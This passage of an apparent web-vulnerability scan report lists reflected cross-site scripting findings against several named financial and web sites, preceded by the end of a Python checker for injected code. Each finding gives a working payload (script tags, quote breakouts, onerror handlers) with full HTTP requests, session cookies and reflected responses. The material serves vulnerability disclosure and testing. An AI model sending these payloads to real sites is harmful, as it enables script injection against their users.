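    JavaScript parser treats as code, skipping double-quoted string literals
    (honouring backslash escapes; a raw newline terminates the literal) and
    // comments. Enough to tell whether reflected text reached code position."""
    out, i, n, in_str = [], 0, len(script), False
    while i < n:
        c = script[i]
        if in_str:
            if c == "\\":
                i += 2
                continue
            if c == '"' or c == "\n":
                in_str = False
            i += 1
            continue
        if c == '"':
            in_str = True
        elif script.startswith("//", i):
            j = script.find("\n", i)
            i = n if j == -1 else j
            continue
        else:
            out.append(c)
        i += 1
    return "".join(out)


def injected_code_runs(page):
    """True if 'alert(' from a payload ended up outside strings and comments."""
    body = SCRIPT_BLOCK.search(page).group(1)
    return "alert(" in js_code_outside_strings(body)
```

Run against the report's payloads, the vulnerable template yields a second `<script` tag for issue 2.1 and puts `alert(1)` in code position for both 2.2 (the newline ends the comment) and 2.3 (the quote ends the string); the encoded template yields one script tag and no executable injected code. The scanner is deliberately small and only understands the two constructs these payloads abuse; it is a check for the example, not a substitute for a real parser.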


2.1. http://360.sorensonmedia.com/api/getPlayerData [vguid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://360.sorensonmedia.com
Path:   /api/getPlayerData

Issue detail

The value of the vguid request parameter is copied into the HTML document as plain text between tags. The payload 4cc9f<script>alert(1)</script>c8d9cd7cbe2 was submitted in the vguid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/getPlayerData?vguid=7d285f50de540c4b64C9b74Y99dcc88d0ad64cc9f<script>alert(1)</script>c8d9cd7cbe2 HTTP/1.1
Host: 360.sorensonmedia.com
Proxy-Connection: keep-alive
Referer: http://static.cdn.360.sorensonmedia.com/1/flash/flowplayer-3.2.2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AWSELB=7399391306302201EC8ED885C1DF301EBE94B9D3266A90D7C75A424550F489FD629C2C3ACAAE7C766E443396D53A4DBE988DB00D0CFDBC4B96568304D3BBF7D375BA252957

Response

HTTP/1.1 200 OK
cache-control: no-cache
Content-Type: text/javascript
Date: Thu, 08 Sep 2011 19:25:08 GMT
pragma: no-cache
Server: nginx/0.5.33
Content-Length: 695
Connection: keep-alive

{
"notAvailableImageURL": "http://360.sorensonmedia.com/images/flash_media_player_unviewable.png",
"errorStatus": "UNVIEWABLE",
"embedCode": "<a href=\"#\" onclick=\"return(false);\" rel=\"videoGUID=7d285f50de540c4b64C9b74Y99dcc88d0ad64cc9f<script>alert(1)</script>c8d9cd7cbe2&\" style=\"display:block;width:640px;height:360px\" id=\"7d285f50de540c4b64C9b74Y99dcc88d0ad64cc9f<script>
...[SNIP]...

2.2. https://account.optionsxpress.com/OpenAccount/Index [firm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Index

Issue detail

The value of the firm request parameter is copied into a JavaScript rest-of-line comment. The payload b5a37%0aalert(1)//18aaa9ddc45 was submitted in the firm parameter. This input was echoed as b5a37
alert(1)//18aaa9ddc45
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(1)//18aaa9ddc45 HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=7168044948469A60359581B20B826924

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68123
Content-Type: text/html; charset=utf-8
Expires: Thu, 08 Sep 2011 19:27:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=66AF9B8F4E24595922509F9212AFCE78; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:27:08 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

</title><link rel="sty
...[SNIP]...
<script type="text/javascript" language="javascript">
var cancelClicked = false;
var countryID = "1";

// var firmName = "OXb5a37
alert(1)//18aaa9ddc45
";

$(document).ready(SetIdleFocusFields);

function SetIdleFocusFields() {
$('input[type="text"]').addClass("idleField");
$('input[type="text"]').focus(fu
...[SNIP]...

2.3. https://account.optionsxpress.com/OpenAccount/Index [firm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Index

Issue detail

The value of the firm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b37e"%3balert(1)//81efc02e54c was submitted in the firm parameter. This input was echoed as 5b37e";alert(1)//81efc02e54c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /OpenAccount/Index?intcmp=lp_sales_futures&firm=OX5b37e"%3balert(1)//81efc02e54c HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=7168044948469A60359581B20B826924

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68139
Content-Type: text/html; charset=utf-8
Expires: Thu, 08 Sep 2011 19:27:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=3635DD574359FB62BB7ED9846973FF9A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:27:03 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

</title><link rel="sty
...[SNIP]...
ionId = $('#guid').val();
var countryID = $('#lstCountryIDSel').val();
var newFirm;
var countryName = $("#lstCountryIDSel option:selected").text();
var oldFirm = "OX5b37e";alert(1)//81efc02e54c";
if (countryID >
...[SNIP]...

2.4. https://account.optionsxpress.com/OpenAccount/Index [firm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Index

Issue detail

The value of the firm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 906ad"onerror%3d"alert(1)"19fe0f61530 was submitted in the firm parameter. This input was echoed as 906ad"onerror="alert(1)"19fe0f61530 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /OpenAccount/Index?intcmp=lp_sales_futures&firm=OX906ad"onerror%3d"alert(1)"19fe0f61530 HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=7168044948469A60359581B20B826924

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68201
Content-Type: text/html; charset=utf-8
Expires: Thu, 08 Sep 2011 19:26:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=DC0FBF694E708FD4EC3FDDB144D503D5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:26:58 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

</title><link rel="sty
...[SNIP]...
<img id="logo" src="/images/logos/firm/newlogo_ox906ad"onerror="alert(1)"19fe0f61530.gif" alt="optionsXpress" border="0"/>
...[SNIP]...

2.5. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97c97"><script>alert(1)</script>dae92c231b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?97c97"><script>alert(1)</script>dae92c231b6=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 08 Sep 2011 19:47:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 117289

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&97c97"><script>alert(1)</script>dae92c231b6=1" type="text/css" media="all" />
...[SNIP]...

2.6. http://optionsxpress.tt.omtrdc.net/m2/optionsxpress/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://optionsxpress.tt.omtrdc.net
Path:   /m2/optionsxpress/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 5d1d7<script>alert(1)</script>6f7d154c782 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/optionsxpress/mbox/standard?mboxHost=www.optionsxpress.com&mboxSession=1315527919598-875378&mboxPage=1315527919598-875378&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=984&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=ox_lp_options_global5d1d7<script>alert(1)</script>6f7d154c782&mboxId=0&mboxTime=1315509919623&mboxURL=http%3A%2F%2Fwww.optionsxpress.com%2Fpromos%2Fexperience_an_options_specialist.aspx%3Fintcmp%3Dlp_sales_futures%26cmpid%3Dgsus23305007%26ef_id%3DzqROZUBXyFQAAIdR%3A20110908192437%3As&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dfutures%2Btrading&mboxVersion=39 HTTP/1.1
Host: optionsxpress.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 216
Date: Thu, 08 Sep 2011 19:25:33 GMT
Server: Test & Target

mboxFactories.get('default').get('ox_lp_options_global5d1d7<script>alert(1)</script>6f7d154c782',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315527919598-875378.19");

2.7. http://transworld.websol.barchart.com/main.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://transworld.websol.barchart.com
Path:   /main.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e797'%3balert(1)//508d34a2d3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e797';alert(1)//508d34a2d3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.php?page=def/8e797'%3balert(1)//508d34a2d3fault HTTP/1.1
Host: transworld.websol.barchart.com
Proxy-Connection: keep-alive
Referer: http://www.transworldfutures.com/quotes.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:00:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Via: 1.1 websol.barchart.com (Apache/2.2.9)
P3P: CP="NON ADM OUR STP"
Content-Language: en
Content-Length: 17302

document.write('<table width="100%" cellpadding="3" cellspacing="4" border="0">');
document.write('<tr><td class="bcQuotesCharts">Quotes &amp; Charts</td><td align="right" rowspan="2">');
document.wri
...[SNIP]...
mp = '';
   var page;
   if(bc_QueryForm['bcpage'])
       page = bc_QueryForm['bcpage'];
   else if (tmp)
       page = tmp;
   else if(bc_QueryForm['page'])
       page = bc_QueryForm['page'];
   else
       page = 'def/8e797';alert(1)//508d34a2d3fault';
   var qpage = 'def/8e797';alert(1)//508d34a2d3fault';
   var bcchartheader = '';

   // Include common JavaScript code.
   document.write('<script type="text/javascript" src="' + 'http' + '://shar
...[SNIP]...

2.8. http://transworld.websol.barchart.com/main.php [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://transworld.websol.barchart.com
Path:   /main.php

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3753'%3balert(1)//130dd2f800b was submitted in the page parameter. This input was echoed as d3753';alert(1)//130dd2f800b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.php?page=defaultd3753'%3balert(1)//130dd2f800b HTTP/1.1
Host: transworld.websol.barchart.com
Proxy-Connection: keep-alive
Referer: http://www.transworldfutures.com/quotes.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:00:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Via: 1.1 websol.barchart.com (Apache/2.2.9)
P3P: CP="NON ADM OUR STP"
Content-Language: en
Content-Length: 17300

document.write('<table width="100%" cellpadding="3" cellspacing="4" border="0">');
document.write('<tr><td class="bcQuotesCharts">Quotes &amp; Charts</td><td align="right" rowspan="2">');
document.wri
...[SNIP]...
= '';
   var page;
   if(bc_QueryForm['bcpage'])
       page = bc_QueryForm['bcpage'];
   else if (tmp)
       page = tmp;
   else if(bc_QueryForm['page'])
       page = bc_QueryForm['page'];
   else
       page = 'defaultd3753';alert(1)//130dd2f800b';
   var qpage = 'defaultd3753';alert(1)//130dd2f800b';
   var bcchartheader = '';

   // Include common JavaScript code.
   document.write('<script type="text/javascript" src="' + 'http' + '://shared.we
...[SNIP]...

2.9. http://webstation.barchart.com/eflogin.php [txtPassword parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://webstation.barchart.com
Path:   /eflogin.php

Issue detail

The value of the txtPassword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4752"><script>alert(1)</script>a4140041353 was submitted in the txtPassword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /eflogin.php HTTP/1.1
Host: webstation.barchart.com
Proxy-Connection: keep-alive
Referer: http://webstation.barchart.com/eflogin.php
Content-Length: 25
Cache-Control: max-age=0
Origin: http://webstation.barchart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=l8d8m1qkadr5phrb94ttmb4st3

txtUsername=&txtPassword=a4752"><script>alert(1)</script>a4140041353

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:34:36 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.3
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3470
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript" type="text/javascript" src="js/DetectEnv.js"></sc
...[SNIP]...
<input type="password" id="txtPassword" name="txtPassword" value="a4752"><script>alert(1)</script>a4140041353" style="left: 100px; position: absolute; top: 120px; width: 150px; background-color: #eaeaea;" />
...[SNIP]...

2.10. http://webstation.barchart.com/eflogin.php [txtUsername parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://webstation.barchart.com
Path:   /eflogin.php

Issue detail

The value of the txtUsername request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea4ef"><script>alert(1)</script>38aecde0899 was submitted in the txtUsername parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /eflogin.php HTTP/1.1
Host: webstation.barchart.com
Proxy-Connection: keep-alive
Referer: http://webstation.barchart.com/eflogin.php
Content-Length: 25
Cache-Control: max-age=0
Origin: http://webstation.barchart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=l8d8m1qkadr5phrb94ttmb4st3

txtUsername=ea4ef"><script>alert(1)</script>38aecde0899&txtPassword=

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:34:36 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.3
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3470
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript" type="text/javascript" src="js/DetectEnv.js"></sc
...[SNIP]...
<input type="text" id="txtUsername" name="txtUsername" value="ea4ef"><script>alert(1)</script>38aecde0899" style="left: 100px; position: absolute; top: 100px; width: 150px; background-color: #eaeaea;" onfocus="if (this.value == 'Enter Username') { this.value=''; }" />
...[SNIP]...

2.11. https://www.barchart.com/register/realtime/css/_basicFormCSS.php [errorIds parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.barchart.com
Path:   /register/realtime/css/_basicFormCSS.php

Issue detail

The value of the errorIds request parameter is copied into the HTML document as plain text between tags. The payload 98ee8<script>alert(1)</script>5edcc6f41ce was submitted in the errorIds parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register/realtime/css/_basicFormCSS.php?errorIds=98ee8<script>alert(1)</script>5edcc6f41ce HTTP/1.1
Host: www.barchart.com
Connection: keep-alive
Referer: https://www.barchart.com/register/realtime/?ID=EF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:40:59 GMT
Server: Apache/2.2.9 (Fedora) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 2409
Content-Type: text/css
Content-Language: en
Via: 1.1 www.barchart.com (Apache/2.2.9)
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive

form.realtime h1, form.realtime h2, form.realtime h3, form.realtime p, form.realtime li {
   font-family: "Arial", sans-serif;
}
form.realtime h1, form.realtime h2, form.realtime h3 {
   margin: 1.5em 0 .
...[SNIP]...
ow fieldset { padding: .25em; }
.infoVendorSubcriber { margin-left: 2em; }
.required { color: red; }
#errorMessages { padding: 1em; }
#errorMessages p { font-weight: bold; margin: 0; }

#errorMessages,98ee8<script>alert(1)</script>5edcc6f41ce { background-color: #FCC; }

2.12. http://www.efutures.com/faq.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.efutures.com
Path:   /faq.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5665b"><script>alert(1)</script>81084ae80e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faq.php/5665b"><script>alert(1)</script>81084ae80e2 HTTP/1.1
Host: www.efutures.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:47:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a class="active" href="/5665b"><script>alert(1)</script>81084ae80e2?category=1">
...[SNIP]...

2.13. http://www.efutures.com/traders/news.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.efutures.com
Path:   /traders/news.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42018"><script>alert(1)</script>2e60a284e12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /traders/news.php/42018"><script>alert(1)</script>2e60a284e12 HTTP/1.1
Host: www.efutures.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:47:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/42018"><script>alert(1)</script>2e60a284e12?news_id=2417">
...[SNIP]...

2.14. http://www.futurestrading.com/managed-accounts/what-are-managed-futures.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.futurestrading.com
Path:   /managed-accounts/what-are-managed-futures.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f91b8<script>alert(1)</script>8c91014d9af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /managed-accountsf91b8<script>alert(1)</script>8c91014d9af/what-are-managed-futures.html HTTP/1.1
Host: www.futurestrading.com
Proxy-Connection: keep-alive
Referer: http://www.futurestrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: af954db55ff4d54a88e086fc2a1751f0=f7f0571d6de3a89fad76557c5546f2e6; __utma=221442575.134975660.1315527952.1315527952.1315527952.1; __utmc=221442575; __utmz=221442575.1315527952.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=futures%20trading

Response

HTTP/1.1 404 Component not found (http://www.futurestrading.com/managed-accountsf91b8<script>alert(1)</script>8c91014d9af/what-are-managed-futures.html)
Date: Thu, 08 Sep 2011 20:01:44 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
